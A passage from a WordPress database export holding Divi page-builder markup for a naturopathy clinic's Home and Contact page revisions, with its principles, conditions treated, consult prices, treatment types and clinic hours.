header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & Mundaring</span><br /><span style=\"font-family: Montserrat;\">Online consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" hover_enabled=\"0\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\" sticky_enabled=\"0\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9am-6pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 9am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9am-1pm</span></p>\n<p> </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Contact','','inherit','closed','closed','','26-revision-v1','','','2021-08-11 13:49:27','2021-08-11 05:49:27','',26,'https://verdenaturopathy.com.au/?p=338',0,'revision','',0),(341,1,'2021-08-22 16:13:20','2021-08-22 08:13:20','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic health approach</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" hover_enabled=\"0\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\"]<p><span style=\"font-family: Montserrat;\">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by six naturopathic principles, utilising these to form evidence-based treatment plans that encompass the person as a whole:</span><span style=\"font-family: Montserrat;\"></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat;\">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat;\">the healing power of nature</span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat;\">treat the person as a whole<span style=\"font-size: 16px;\"></span></span></li>\n<li><span style=\"font-family: Montserrat;\">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"><span>We can support health in many conditions, including:</span></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat;\"><span>gastrointestinal issues (IBS, IBD, GORD, bloating, poor digestion)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>nervous system imbalance (anxiety, low mood, stress, poor sleep)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>metabolic dysfunction (insulin resistance)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>immune dysfunction (autoimmunity, recurrent infections)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>thyroid conditions (hyper/hypothyroidism)</span></span><span style=\"font-family: Montserrat;\"><span></span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>hormonal imbalance (PCOS, endometriosis, PMS, menopause, period abnormalities)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>cardiovascular health (chronic inflammation, high cholesterol)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>men\'s health (prostate issues, sexual health)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>children\'s health (poor immunity, digestive issues, behavioural issues)</span></span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"><span>Our approach is holistic; we encourage collaboration with both conventional and complementary medicine practitioners to ensure you are supported along your health journey.</span></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20210503_205936_105.jpg\" title_text=\"IMG_20210503_205936_105\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|75|75|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20200714_175859_865.jpg\" title_text=\"IMG_20200714_175859_865\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.9.4\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Consultations</span></h2>\n<p><span style=\"font-size: x-large; font-family: Montserrat;\">Choose from face-to-face or online consults</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" module_alignment=\"center\" custom_margin=\"||||false|false\" custom_padding=\"0px|0px|0px|0px|true|false\" border_radii=\"off||||\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" custom_padding=\"|0px||0px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial consult (75 min) - $120\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up consult (45 min) - $80\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on. </span><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express consult (20 min) - $40\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies, emotional health issues or script reviews. Not suitable for long-term or chronic health issues.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ffffff\" max_width=\"1082px\" module_alignment=\"center\" custom_padding=\"0px||0px||false|false\" border_width_all=\"1px\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"default\" text_font=\"Montserrat||||||||\" background_color=\"#ffffff\" custom_padding=\"10px||10px||false|false\"]<p style=\"text-align: center;\"><span style=\"font-size: large;\">Discounts available for children under 12, students and seniors</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span>\nCapsules/tablets<span style=\"font-family: Montserrat;\"></span>\nTeas\nTopical creams\n [/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Stress strategies</span>\n<span style=\"font-family: Montserrat;\">Exercise and movement</span>\n<span style=\"font-family: Montserrat;\">Mindfulness </span>\n<span style=\"font-family: Montserrat;\">Sleep support</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat; font-weight:;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" border_color_left=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" inline_fonts=\"Playfair Display\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22border_color_all%22,%22border_color_left%22%93}\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||3px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & Mundaring</span><br /><span style=\"font-family: Montserrat;\">Online consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\"></span></strong></h3>\n<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9am-6pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 9am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2021-08-22 16:13:20','2021-08-22 08:13:20','',28,'https://verdenaturopathy.com.au/?p=341',0,'revision','',0),(343,1,'2021-08-22 16:25:11','2021-08-22 08:25:11','','IMG_20210701_202413_037','','inherit','open','closed','','img_20210701_202413_037','','','2021-08-22 16:25:11','2021-08-22 08:25:11','',0,'https://verdenaturopathy.com.au/wp-content/uploads/2021/08/IMG_20210701_202413_037.jpg',0,'attachment','image/jpeg',0),(345,1,'2021-08-22 16:29:48','2021-08-22 08:29:48','','IMG_20210701_202413_037','','inherit','open','closed','','img_20210701_202413_037-2','','','2021-08-22 16:29:48','2021-08-22 08:29:48','',0,'https://verdenaturopathy.com.au/wp-content/uploads/2021/08/IMG_20210701_202413_037-1.jpg',0,'attachment','image/jpeg',0),(346,1,'2021-08-22 16:30:03','2021-08-22 08:30:03','','IMG_20210701_202413_037','','inherit','open','closed','','img_20210701_202413_037-3','','','2021-08-22 16:30:03','2021-08-22 08:30:03','',0,'https://verdenaturopathy.com.au/wp-content/uploads/2021/08/IMG_20210701_202413_037-2.jpg',0,'attachment','image/jpeg',0),(350,1,'2021-08-22 16:32:38','2021-08-22 08:32:38','','IMG_20210701_202413_037','','inherit','open','closed','','img_20210701_202413_037-5','','','2021-08-22 16:32:38','2021-08-22 08:32:38','',0,'https://verdenaturopathy.com.au/wp-content/uploads/2021/08/IMG_20210701_202413_037-4.jpg',0,'attachment','image/jpeg',0),(353,1,'2021-08-22 16:45:45','2021-08-22 08:45:45','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" 